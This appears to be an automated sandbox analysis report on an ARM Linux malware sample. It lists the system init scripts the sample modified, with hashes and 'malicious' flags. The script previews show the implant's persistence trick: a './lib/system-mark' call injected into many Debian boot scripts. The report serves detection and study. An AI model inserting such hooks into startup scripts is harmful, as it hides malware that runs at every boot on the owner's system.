                                                                          Preview:#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

                                                                          /etc/init.d/hwclock.sh

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3946
                                                                          Entropy (8bit):5.1522498878727045
                                                                          Encrypted:false
                                                                          SSDEEP:96:uYqy3be4txLsMwqTZL5FFTUaTfNvagXQwjdjNvaYXDkeQz:VZbxtXFZNZTfNvawxjNva4e
                                                                          MD5:40E4F04E723FB5BEE6DF2327EA35254D
                                                                          SHA1:D512EAB734F222022E210CCA19128E992691CF78
                                                                          SHA-256:EEC4726C42AA93DEB9D6228BD464ED33FB6C1FF6FFD88ECC14C603746A7C444A
                                                                          SHA-512:71D245EA40A64FDCCAAA88D869F8E929F5FA9736FB16D7079CE41184CA9DA71F40E2E6EFED8382C4350089932AAC8C588271F72FB9E5139E35FF504C65127227
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

                                                                          /etc/init.d/irqbalance

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2707
                                                                          Entropy (8bit):4.995870971917478
                                                                          Encrypted:false
                                                                          SSDEEP:48:92ZPnWGmH6TMV5m11QU7BXCW3gxxsXuHtpyBMbtKxxsDKV/BkH5:92Z/WbZnm11LByWwxKXuHtcBMbtKxKDr
                                                                          MD5:E666B216857A200A89A8C38279974070
                                                                          SHA1:5184B1942742E7D4811A8BA0080BD19413306EB5
                                                                          SHA-256:3A9EF64FD98E3991ABEE18FE69ED507EE8516B5777E7B3E8BB3BC69AE997D1F8
                                                                          SHA-512:A2BC047C6034F8594B640DD5A7746AAD3F6BEAC9239AA71C00C90EB19FF37FAD38B08A5ACC0B8E1928CC447450C0A69E3FB4C8A6EF65EC584227F0E8ACF1F3D2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON || exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

                                                                          /etc/init.d/iscsid

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1555
                                                                          Entropy (8bit):4.972539518025109
                                                                          Encrypted:false
                                                                          SSDEEP:24:2Ex/YpMr8MICUV7OlfrDNhay+HNCNIlH3U8lrQ5l8u4uuCG:/puMAMICu7OlN+UIlH3U8lc/ZWCG
                                                                          MD5:ECC4B12F805560CED916AF27BF8423D1
                                                                          SHA1:A5954BF38D2E34AE23286D676FE6E4153CDBFF69
                                                                          SHA-256:C33D4A5025DB90ACA69F23F041F2AFB4B31F1016DF03631C6D918A4EF5E6842D
                                                                          SHA-512:CFAC2CC9451D012F8A4DACFFC6ACA4C9456FF4F0D212C419443C0939CEB0AFE1DAE59329D9F9D27413A9E6CF2E0D05775C873AE53C355C0A8A738DB07120CAD3
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

                                                                          /etc/init.d/keyboard-setup.sh

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1548
                                                                          Entropy (8bit):4.309956240738216
                                                                          Encrypted:false
                                                                          SSDEEP:48:9XfgD1yQyKzYcg/LshTJckS5MJAb8kGh5A9b6:9YQLH/w5SO
                                                                          MD5:89A7217DCF2B72ACC044B81A9CC3FC6F
                                                                          SHA1:E4E5E503268D650B4F0FE7C37DC0BD3EFA1CABC6
                                                                          SHA-256:896A6EAFC64047CB19D6319915BD349FD3B90A8BECA8A83AB2153EEC519A59E5
                                                                          SHA-512:8E6B76171B23133C44AB7CF19DCCCE87FD0AA38F4BC0520AB6F2AFA64CA506D447C192F0B09A8584D9C2203F665E89D8D33B3EA30E53681F5BA62A1DABC1DBC6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop|status). # console-setup isn't a daemon. ;;. start|force-reload|restart|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

                                                                          /etc/init.d/kmod

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2164
                                                                          Entropy (8bit):4.907145181173842
                                                                          Encrypted:false
                                                                          SSDEEP:24:+mUxLADBzBQYDMAKjqg3Ulfb4MZC/tCYJGMsMHwDa1kig/ue5NrGgbcl8d:l/dtQYxKjRQfbO/oYJbJQAki6jzz
                                                                          MD5:0B192EEF5B7E6AE9C89B8E127943E04C
                                                                          SHA1:6F6B5F63D1F504524C5C27849353255A6EDEA52E
                                                                          SHA-256:D43E4D15B82D9D85BEF6B2B676506AED1B7FC3C50232BFB7BFE1D0202C83DCA3
                                                                          SHA-512:860ACA2D19758EAA6FD8C3D0552674842916C4F853A6739932A9E66B68582E5359AD91EE4F27443992ACCA380BFC33C2178BCAA21B93A812916CB228B831BA82
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] || exit 0.[ -x /sbin/modprobe ] || exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop|restart|reload|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_action_msg "Loading kernel module $module". modprobe $module $args || true. else. modprobe $module $args > /dev/null 2>&1 || t

                                                                          /etc/init.d/lightdm

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3534
                                                                          Entropy (8bit):5.282612583353571
                                                                          Encrypted:false
                                                                          SSDEEP:48:fbmo8vyUjH3J+cNrWId4KF9wDeXxr/FI/F7R7cJ0IB6rd/g1ZsbHaXAZ4td/WzvA:d8z3J+cNiR4SzGmJHyRDuHTWld
                                                                          MD5:E6E338C277324717A5722E4EA56AA2EE
                                                                          SHA1:46334BCB354D10D0AAC47F4D542710B66D446A77
                                                                          SHA-256:5BF68D24F74EC03AE3E2D53B8F57E51C8C3CB320FE53E5D6C8F3214E25EE9C29
                                                                          SHA-512:19AF2485DB58640CFEA8E245A4E1E57624239C12B961C7218B5B50FB880985D4275862F0F8FA805D004314844B791E8F2FE248A7797FF4D5082A892E34126DE9
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

                                                                          /etc/init.d/lm-sensors

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):901
                                                                          Entropy (8bit):5.1022129052660485
                                                                          Encrypted:false
                                                                          SSDEEP:12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsFoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/IwfJ2Hjq13O
                                                                          MD5:46FB137F6F75999F794FDB149BCAD53B
                                                                          SHA1:90F88FB0972A25A2BBEA62DB26EA84ED9CFC036D
                                                                          SHA-256:D661181FDD70CE80EF52393D7A58D33009CAE7ED2EB62C764C4CAC0181DD7E76
                                                                          SHA-512:C360EB8E5FD3E7A7740D6AE395DB430811306C176C9E3FEA975E76B6474533A30F709155A81F007E29DC61AE2200445CCD79F08139998BA575115F7CE45340CC
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM || exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system-mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start|stop|restart|force-reload|status}"..exit 1.esac..exit 0..

                                                                          /etc/init.d/lvm2-lvmpolld

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):604
                                                                          Entropy (8bit):5.314197695143652
                                                                          Encrypted:false
                                                                          SSDEEP:12:wdRDNeBuYrBMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Ex/lti9OXylj/
                                                                          MD5:273FB590FE7F5DAE000DC871BC5418DB
                                                                          SHA1:90575E32A398270FC2D10448A454646B84F3B257
                                                                          SHA-256:D9EDBDDD0D0151FDC741B4C0B8F6910DC01D9A6F2F2CBE5705297E4B27EE9C0F
                                                                          SHA-512:62B1896678941476EF1DF756AC16B136F0FDB1E86A53A8DC17340BDF03504BC7C54A8E04807B692A9F15A7904CE6E0087D3F6373C2CF1F6807444B36E45ABDCB
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

                                                                          /etc/init.d/mono-xsp4

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2518
                                                                          Entropy (8bit):5.325203715837751
                                                                          Encrypted:false
                                                                          SSDEEP:48:7HvaUX9Q3esRt33P4AWNr/42Fwk0qmA40O4pTjmCjVwUH:7PaUX0eSt3/VczgWBbjmCjVwS
                                                                          MD5:0DBC33D8B96CA2A841D1A83960BDF389
                                                                          SHA1:BDC86C7897C467A42075B2C80A1CAEDCCA794F76
                                                                          SHA-256:631AD4D36C691EBC1AADD6006C597B64A69F4AF1F6AA2455A8F4F2563F11F13D
                                                                          SHA-512:F6320E3BD73BC5AFFD6C3D13832F836CE81323C0A059D26C9294A65C3DA7B3A394BC5A20C6B07244F48499BB5B8E3A7869A7E48FAF916CEABC495B8D281BDB8F
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON || exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system-mark. exit 0.fi..if [ ! -e $MO

                                                                          /etc/init.d/multipath-tools

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2964
                                                                          Entropy (8bit):5.31314714541473
                                                                          Encrypted:false
                                                                          SSDEEP:48:7HUksR9JrtNCDCJ99TaPn1PCDCJ99TafOBUV1kqH2fQuzfg61U149eh7KKSKMs:7HUkwbrSDu+Pn1qDu+2qV1RHSQuzA4I5
                                                                          MD5:54E61FBA1E794A3A95B4FA31099CEB2F
                                                                          SHA1:4036B83019BAE7A2D843C13C52AA91A86C4D4CA4
                                                                          SHA-256:BAEC2D4F6968AE735457DE716EB7E880C03C410A53A1C19563C258D78852874E
                                                                          SHA-512:6AC88EF6CDE8A2D98ED14A879CEDD04B263F252C0A03E93FBF5F6B50AF5416BDD3BAC231E43C98BA5DF0043703D67F1852D9159672B43D5D5EC0EC61BA431688
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON || exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system-mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system-mark.for slave in slaves/*;.do..if [ "$slave" = "slaves/*" ]; then./lib/system-mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath | sed -n "s/\(.*\): .* $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system-mark....log_daemon_msg "Root is on a multipathed device, multipathd c

                                                                          /etc/init.d/open-iscsi

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2589
                                                                          Entropy (8bit):5.112756814918559
                                                                          Encrypted:false
                                                                          SSDEEP:48:7UMRMrEm3cy8Nc8NgZlfMMtWBAl3ATeTPAdWIlRdWdtRMg02AC9ArANTcAhicF:7b2rH338azZlfn/lwA4dWIhC8DUbL
                                                                          MD5:207481F279E4D4E87E2455C16287C685
                                                                          SHA1:1CC3B8B32EE2BCD5342F38B66C936C4EC18897F4
                                                                          SHA-256:225B755072D5C433DE74DE26633834FF05A6956053557F1B3F634AE08752C6BF
                                                                          SHA-512:E494C2A33928070E2E1BACA3AE53814986AC7C9CEB3B4D31CAE0C0202AC2BEE98CF65A196387FAA7EED560B6AC6665EE6D3C77630167ADFDBF82C99FE3F65B14
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] || exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system-mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system-mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] || ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

                                                                          /etc/init.d/open-vm-tools

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1881
                                                                          Entropy (8bit):4.863837327437562
                                                                          Encrypted:false
                                                                          SSDEEP:48:1a/f0aOHh86/X/QA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB86j4e8j8Q8Ml8OmooG2D3k
                                                                          MD5:CE0C8A7E1042C39FB28FEE6981E2ACE4
                                                                          SHA1:C7B193DB855B637F7011A28928DE2E0A5796B825
                                                                          SHA-256:32735889841F4B203B9C06278D9A178D08AF5288474F475A31F0AC2669C1DD56
                                                                          SHA-512:1B676B9B1CB75C48D5B4EE6D34E402A6B99C4CECA8B261177396C13E63323A5C6A9F62B556FFAB110C25B9066D4253E9C0ACB1D3DA790ECD70426DD9A0AA46C1
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system-mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} | grep -iq vmware; then./lib/system-mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null || exit 1.

                                                                          /etc/init.d/plymouth

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1401
                                                                          Entropy (8bit):5.3052027136710675
                                                                          Encrypted:false
                                                                          SSDEEP:24:1sqE3A2EYVwMwRwDTMBgV2APfcVwAPYIpPgfS+VGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzQAsVwAgGYfdVz58Y9f5v
                                                                          MD5:2B23E2A5868129F5B68D4465E1FBA27A
                                                                          SHA1:8781CE140244ABA8178CCC20B50AB3C252D82A1F
                                                                          SHA-256:5D49F02BB6C8C031EA02F67ABFB812EB75425058AD30F44FAB85A9463D2DB1CC
                                                                          SHA-512:8DBA742FB4B66C0799E66FA5E070161E2EDBA95A0789A06F51910D659F51E6313D32072078A44B7D2A46CD18B63036F07FBFBD8AEF90843643860424FED398D4
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd || exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash*)....SPLASH="true"....;;....nosplash*|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system-mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

                                                                          /etc/init.d/plymouth-log

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):787
                                                                          Entropy (8bit):5.274418902272115
                                                                          Encrypted:false
                                                                          SSDEEP:12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCR6D02ygvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgTHygvR4MLoVS
                                                                          MD5:92B74D7357C759DB635940F9DBE7A5E8
                                                                          SHA1:88C813B379F01849C7A709BF47D8C40AB2A25345
                                                                          SHA-256:DBDAB3736BE330D3CC39A75E100F6FB8D9094413A7D24CAC22A8BE39DE25D3C3
                                                                          SHA-512:405A8103CE19E154E58A9B0D26C888807F1DE5B3A98EF8C66DF31F3113542215004FD4CD9783C021ED27FEC165B4605CF6B92C141AD9E2BE4872C1D80A34B6E7
                                                                          Malicious:true
                                                                          Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth || exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system-mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system-mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop|restart|force-reload)....;;...*)...echo "Usage: ${0} {start|stop|restart|force-reload}" >&2...exit 1...;;.esac..exit 0..

                                                                          /etc/init.d/procps

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):942
                                                                          Entropy (8bit):5.25253518776668
                                                                          Encrypted:false
                                                                          SSDEEP:12:atdRDNeBuYrBMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLEx/25+Z+nMfTWTeCKa3VfhL69z0
                                                                          MD5:BEA2BDFD5F7688D4F6E313DC63CA499D
                                                                          SHA1:4D6764F461EE096E83A5F5923ED8472A94526E95
                                                                          SHA-256:8D2D9E87F61D6D84EFF365927CB97A21EBFC3C9B9BDA48D13858D285AD332466
                                                                          SHA-512:932B314974F2AA88FC3E1292729F166EC1459B2951F476F9E9CFA00AC0A36B0687C3CC1BED94B968BBAAF47C3D679CFBE152DFE984E54306800FB85A16DE0F3D
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system || STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

                                                                          /etc/init.d/rsync

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):4639
                                                                          Entropy (8bit):5.249855326047257
                                                                          Encrypted:false
                                                                          SSDEEP:96:jdRMpo498RXFzyb1U0lKRuHp8gXGHoNURkx:jdRMpJ98g1U0c8JxWINUmx
                                                                          MD5:BBBAC3DC084FCC76813396852B0383FE
                                                                          SHA1:675F156F5AAF3BFA73C23A1478680F9769D19926
                                                                          SHA-256:BF77774A109F072532F634BCC63FB7DA005BEB0D553418FA42DED906F3025EFF
